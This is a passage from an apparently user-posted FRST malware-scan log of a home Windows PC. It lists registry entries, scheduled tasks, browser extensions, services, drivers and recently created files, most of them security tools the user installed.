HKU\S-1-5-18\…\Policies\Explorer: [NoStartMenuSubFolders] 0
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.142\Installer\chrmstp.exe [2019-07-17] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> 
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" –configure-user-settings –verbose-logging –system-level
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2019-05-02] (Adobe Inc. -> Adobe Systems, Inc.)
Lsa: [Notification Packages] scecli "C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter"
SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {034F7BE4-01E6-4669-A2EF-FA2AC0C9E23C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [6854360 2016-08-05] (Piriform Ltd -> Piriform Ltd)
Task: {204D31B9-4534-423F-88F8-0466AFC5D8F9} - System32\Tasks\GoogleUpdateTaskMachineCore1d1e91cd5856273 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {62E5C6B1-ACB5-4C1A-96E8-0F322FACE3DD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {85F719B8-C8CA-43C2-849D-905BBA4D32B0} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
Task: {882871F6-228A-4C1D-A564-00BDD16F6104} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {9A408C34-360B-497B-BBA8-525499AC4E4E} - System32\Tasks\RogueKiller Anti-Malware => C:\Program Files\RogueKiller\RogueKiller64.exe [34898488 2019-07-15] (Adlice -> )
Task: {B364A280-0AB9-48E1-B7ED-06A42757557E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-06-21] (Adobe Inc. -> Adobe)
Task: {BDE7241D-F37A-4748-820E-C0D22FF79E38} - System32\Tasks\GoogleUpdateTaskMachineUA1d1e91cd5f87143 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {D779E8F6-3857-4C64-9400-9436F7A4E174} - System32\Tasks\Games\UpdateCheck_S-1-5-21-441904776-594677368-125994074-1001 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2012-12-07] (Microsoft Windows -> Microsoft Corporation)
Task: {E6F7E74A-4FD9-413B-AC43-C8B52DE8BD76} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_207_Plugin.exe [1457208 2019-06-21] (Adobe Inc. -> Adobe)
Task: {FE7F83D2-5527-44B6-9775-DA7DCF6AEBFD} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{29DCBCA3-040D-4832-8D35-34BEB5274039}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{A183BB9B-B707-4E38-BC51-E5EA52B835BF}: [DhcpNameServer] 192.168.1.254
 
Internet Explorer:
==================
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-441904776-594677368-125994074-1001 -> DefaultScope {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form;=MNMTDF&pc;=MANM&src;=IE-SearchBox
SearchScopes: HKU\S-1-5-21-441904776-594677368-125994074-1001 -> {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form;=MNMTDF&pc;=MANM&src;=IE-SearchBox
BHO: Webroot Filtering Extension -> {C9C42510-9B41-42c1-9DCD-7282A2D07C61} -> C:\Program Files\Common Files\Webroot\WebFiltering\wrflt.dll [2017-01-27] (Webroot Inc. -> Webroot)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Webroot Filtering Extension -> {C9C42510-9B41-42c1-9DCD-7282A2D07C61} -> C:\Program Files (x86)\Common Files\Webroot\WebFiltering\wrflt.dll [2017-01-27] (Webroot Inc. -> Webroot)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
 
FireFox:
========
FF DefaultProfile: qb6le4mq.default-1439605903410-1540077903902
FF ProfilePath: C:\Users\richard\AppData\Roaming\Mozilla\Firefox\Profiles\qb6le4mq.default-1439605903410-1540077903902 [2019-07-25]
FF HKLM\…\Firefox\Extensions: [[removed]] - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer
FF Extension: (Webroot Filtering Extension) - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer [2017-01-27] [Legacy]
FF HKLM-x32\…\Firefox\Extensions: [[removed]] - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_207.dll [2019-06-21] (Adobe Inc. -> )
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_207.dll [2019-06-21] (Adobe Inc. -> )
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL [2011-04-20] (CANON INC.) [File not signed]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-05-02] (Adobe Inc. -> Adobe Systems Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/","hxxp://facebook.com/"
CHR Profile: C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default [2019-07-25]
CHR Extension: (Docs) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-25]
CHR Extension: (Google Drive) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-20]
CHR Extension: (YouTube) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2019-04-20]
CHR Extension: (Google Search) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-01]
CHR Extension: (Search by Image (by Google)) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\dajedkncpodkggklbegccjpmnglmnflm [2016-10-20]
CHR Extension: (Adobe Acrobat) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-06-11]
CHR Extension: (Google Docs Offline) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26]
CHR Extension: (Grammarly for Chrome) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2019-07-17]
CHR Extension: (Webroot Filtering Extension) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjeghcllfecehndceplomkocgfbklffd [2019-06-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-05]
CHR Extension: (Gmail) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-15]
CHR Extension: (Chrome Media Router) - C:\Users\richard\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-06-21]
CHR HKLM-x32\…\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\…\Chrome\Extension: [kjeghcllfecehndceplomkocgfbklffd] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [240640 2012-12-19] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [233328 2012-01-23] (DTS, Inc. -> DTS, Inc)
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5750440 2015-09-04] (Fitbit, Inc. -> Fitbit, Inc.) [File not signed]
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Common Files\Futuremark Shared\Futuremark SystemInfo\FMSISvc.exe [130976 2011-03-01] (Futuremark, Inc. -> Futuremark Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [166720 2012-06-25] (Intel Corporation -> Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6744288 2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
S3 RaMediaServer; C:\Program Files (x86)\Ralink\Common\RaMediaServer.exe [621632 2011-03-04] (Ralink Technology Corporation -> )
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
R2 WRSVC; C:\Program Files\Webroot\WRSA.exe [4584344 2019-07-17] (Webroot Inc. -> Webroot)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 ahcix64s; C:\Windows\system32\drivers\ahcix64s.sys [290600 2011-09-23] (Promise Technology -> Advanced Micro Devices, Inc)
R3 amdkmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [11278336 2012-12-19] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\Windows\System32\DRIVERS\atikmpag.sys [552960 2012-12-19] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R0 asahci64; C:\Windows\System32\DRIVERS\asahci64.sys [49760 2012-01-06] (ASMedia Technology Inc. -> Asmedia Technology)
R3 asmthub3; C:\Windows\System32\DRIVERS\asmthub3.sys [130536 2011-11-03] (MCCI Internal Testing Software -> ASMedia Technology Inc)
R3 asmtxhci; C:\Windows\System32\DRIVERS\asmtxhci.sys [395752 2011-11-03] (MCCI Internal Testing Software -> ASMedia Technology Inc)
R3 athr; C:\Windows\System32\DRIVERS\athrx.sys [2811904 2012-05-22] (Microsoft Windows Hardware Compatibility Publisher -> Qualcomm Atheros Communications, Inc.)
R3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96256 2012-11-06] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S3 atikmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [11278336 2012-12-19] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [23832 2011-12-02] (Intel Corporation -> Intel Corporation)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [199768 2019-07-23] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [224408 2019-07-25] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [73584 2019-07-25] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [275232 2019-07-25] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [106344 2019-07-25] (Malwarebytes Corporation -> Malwarebytes)
S3 PSI; C:\Windows\System32\DRIVERS\psi_mf_amd64.sys [18456 2016-02-02] (Secunia -> Secunia)
S3 RTL8167; C:\Windows\System32\DRIVERS\Rt64win7.sys [187392 2009-06-10] (Microsoft Windows -> Realtek Corporation )
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [36168 2019-04-25] (McAfee, Inc. -> The OpenVPN Project)
U3 TrueSight; C:\Windows\System32\drivers\truesight.sys [28272 2019-07-25] (Adlice -> )
S3 t_mouse.sys; C:\Windows\System32\DRIVERS\t_mouse.sys [6144 2012-12-19] (Microsoft Windows Hardware Compatibility Publisher -> )
R0 WRkrn; C:\Windows\System32\drivers\WRkrn.sys [144784 2018-08-01] (Webroot Inc. -> Webroot)
S3 wrUrlFlt; C:\Windows\system32\DRIVERS\wrUrlFlt.sys [66328 2016-09-29] (Webroot Inc. -> Webroot)
U0 SR; no ImagePath
U2 srservice; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-07-25 14:57 - 2019-07-25 14:57 - 000073584 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-07-25 14:56 - 2019-07-25 14:56 - 000224408 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-07-25 14:56 - 2019-07-25 14:56 - 000106344 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-07-25 14:53 - 2019-07-25 14:53 - 000275232 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-07-24 21:36 - 2019-07-25 20:08 - 000002132 _____ C:\Users\richard\Desktop\rklog.txt
2019-07-24 05:09 - 2019-07-13 03:14 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\sipnotify.exe
2019-07-23 08:25 - 2019-07-23 08:32 - 000207638 _____ C:\Windows\ntbtlog.txt
2019-07-22 13:08 - 2019-07-22 13:08 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\3576622E.sys
2019-07-22 13:07 - 2019-07-22 13:07 - 014178840 _____ (Malwarebytes Corp.) C:\Users\richard\Downloads\mbar-1.10.3.1001 (3).exe
2019-07-22 13:06 - 2019-07-22 13:06 - 014178840 _____ (Malwarebytes Corp.) C:\Users\richard\Downloads\mbar-1.10.3.1001 (2).exe
2019-07-20 23:19 - 2019-07-20 23:19 - 000000379 _____ C:\Users\richard\Downloads\Backup-codes-richwigs.txt
2019-07-20 23:19 - 2019-07-20 23:19 - 000000379 _____ C:\Users\richard\Desktop\Backup-codes-richwigs.txt
2019-07-20 18:02 - 2019-07-20 18:02 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\3514E384.sys
2019-07-20 18:01 - 2019-07-22 14:00 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2019-07-20 18:01 - 2019-07-22 13:30 - 000000000 ____D C:\Users\richard\Desktop\mbar
2019-07-20 18:01 - 2019-07-20 18:01 - 014178840 _____ (Malwarebytes Corp.) C:\Users\richard\Downloads\mbar-1.10.3.1001.exe
2019-07-20 18:01 - 2019-07-20 18:01 - 014178840 _____ (Malwarebytes Corp.) C:\Users\richard\Downloads\mbar-1.10.3.1001 (1).exe
2019-07-19 20:05 - 2019-07-22 13:33 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-07-19 19:14 - 2019-07-25 18:31 - 000028272 _____ C:\Windows\system32\Drivers\truesight.sys
2019-07-19 19:13 - 2019-07-25 14:53 - 000003024 _____ C:\Windows\System32\Tasks\RogueKiller Anti-Malware
2019-07-19 19:13 - 2019-07-19 19:14 - 000000000 ____D C:\ProgramData\RogueKiller
2019-07-19 19:12 - 2019-07-19 19:12 - 000000858 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2019-07-19 19:12 - 2019-07-19 19:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2019-07-19 19:12 - 2019-07-19 19:12 - 000000000 ____D C:\Program Files\RogueKiller
2019-07-19 19:10 - 2019-07-19 19:11 - 030667800 _____ (Adlice Software ) C:\Users\richard\Downloads\RogueKiller_setup_ref3.exe
2019-07-19 11:50 - 2019-07-19 12:01 - 000000000 ____D C:\AdwCleaner
2019-07-19 11:50 - 2019-07-19 11:50 - 007025360 _____ (Malwarebytes) C:\Users\richard\Downloads\adwcleaner_7.3.exe
2019-07-19 11:48 - 2019-07-25 20:12 - 000000000 ____D C:\Users\richard\Desktop\whatthetech
2019-07-19 11:48 - 2019-07-23 08:26 - 000199768 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-07-19 11:48 - 2019-07-19 11:48 - 000000000 ____D C:\Users\richard\AppData\Local\mbamtray
2019-07-19 11:48 - 2019-07-19 11:48 - 000000000 ____D C:\Users\richard\AppData\Local\mbam
2019-07-19 11:47 - 2019-07-19 11:47 - 064649064 _____ (Malwarebytes ) C:\Users\richard\Downloads\mb3-setup-consumer-3.8.3.2965-1.0.613-1.0.11612 (2).exe
2019-07-19 11:47 - 2019-07-19 11:47 - 000001867 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-07-19 11:47 - 2019-07-19 11:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-07-19 11:47 - 2019-07-19 11:47 - 000000000 ____D C:\Program Files\Malwarebytes
2019-07-19 11:47 - 2019-01-08 16:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-07-19 11:46 - 2019-07-19 11:46 - 064649064 _____ (Malwarebytes ) C:\Users\richard\Downloads\mb3-setup-consumer-3.8.3.2965-1.0.613-1.0.11612.exe
2019-07-19 11:46 - 2019-07-19 11:46 - 064649064 _____ (Malwarebytes ) C:\Users\richard\Downloads\mb3-setup-consumer-3.8.3.2965-1.0.613-1.0.11612 (1).exe
2019-07-17 09:19 - 2019-07-25 20:12 - 000000000 ____D C:\FRST
2019-07-17 09:19 - 2019-07-17 09:19 - 002095104 _____ (Farbar) C:\Users\richard\Downloads\FRST64.exe
2019-07-17 09:17 - 2019-07-17 09:17 - 001446912 _____ (Farbar) C:\Users\richard\Downloads\FRST (1).exe
2019-07-17 09:12 - 2019-07-17 09:12 - 001446912 _____ (Farbar) C:\Users\richard\Downloads\FRST.exe
2019-07-17 08:59 - 2019-07-17 08:59 - 005198336 _____ (AVAST Software) C:\Users\richard\Downloads\aswMBR (1).exe
2019-07-17 08:37 - 2019-07-17 08:37 - 000185902 _____ C:\Users\richard\Documents\cc_20190717_083742.reg
2019-07-14 20:20 - 2019-07-14 20:20 - 001207336 _____ (Adobe Inc) C:\Users\richard\Downloads\flashplayer32au_ga_install.exe
2019-07-09 19:06 - 2019-06-28 00:24 - 000887808 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2019-07-09 19:06 - 2019-06-28 00:24 - 000448512 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
2019-07-09 19:06 - 2019-06-28 00:24 - 000414208 _____ (Microsoft Corporation) C:\Windows\system32\wlanmsm.dll
2019-07-09 19:06 - 2019-06-28 00:24 - 000118784 _____ (Microsoft Corporation) C:\Windows\system32\wlanhlp.dll
2019-07-09 19:06 - 2019-06-28 00:24 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
2019-07-09 19:06 - 2019-06-28 00:23 - 000428032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanmsm.dll
2019-07-09 19:06 - 2019-06-28 00:23 - 000392704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlansec.dll
2019-07-09 19:06 - 2019-06-28 00:23 - 000083968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanhlp.dll
2019-07-09 19:06 - 2019-06-28 00:23 - 000080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanapi.dll
2019-07-09 19:06 - 2019-06-20 22:09 - 000806400 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2019-07-09 19:06 - 2019-06-20 22:05 - 000628224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2019-07-09 19:06 - 2019-06-20 21:44 - 003229696 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2019-07-09 19:06 - 2019-06-20 20:41 - 001251840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2019-07-09 19:06 - 2019-06-20 04:11 - 000396896 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2019-07-09 19:06 - 2019-06-20 03:15 - 000348976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2019-07-09 19:06 - 2019-06-18 01:41 - 001649664 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2019-07-09 19:06 - 2019-06-17 23:34 - 025730560 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2019-07-09 19:06 - 2019-06-17 23:21 - 002724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2019-07-09 19:06 - 2019-06-17 23:21 - 000004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2019-07-09 19:06 - 2019-06-17 23:09 - 002903552 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2019-07-09 19:06 - 2019-06-17 23:08 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2019-07-09 19:06 - 2019-06-17 23:07 - 000578560 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2019-07-09 19:06 - 2019-06-17 23:07 - 000417280 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2019-07-09 19:06 - 2019-06-17 23:07 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2019-07-09 19:06 - 2019-06-17 23:07 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2019-07-09 19:06 - 2019-06-17 23:00 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2019-07-09 19:06 - 2019-06-17 22:59 - 005775872 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2019-07-09 19:06 - 2019-06-17 22:59 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2019-07-09 19:06 - 2019-06-17 22:57 - 000615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2019-07-09 19:06 - 2019-06-17 22:56 - 020274688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2019-07-09 19:06 - 2019-06-17 22:56 - 000790528 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2019-07-09 19:06 - 2019-06-17 22:56 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2019-07-09 19:06 - 2019-06-17 22:56 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2019-07-09 19:06 - 2019-06-17 22:55 - 000814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2019-07-09 19:06 - 2019-06-17 22:51 - 002724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2019-07-09 19:06 - 2019-06-17 22:48 - 000969216 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2019-07-09 19:06 - 2019-06-17 22:45 - 000489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2019-07-09 19:06 - 2019-06-17 22:39 - 000496128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
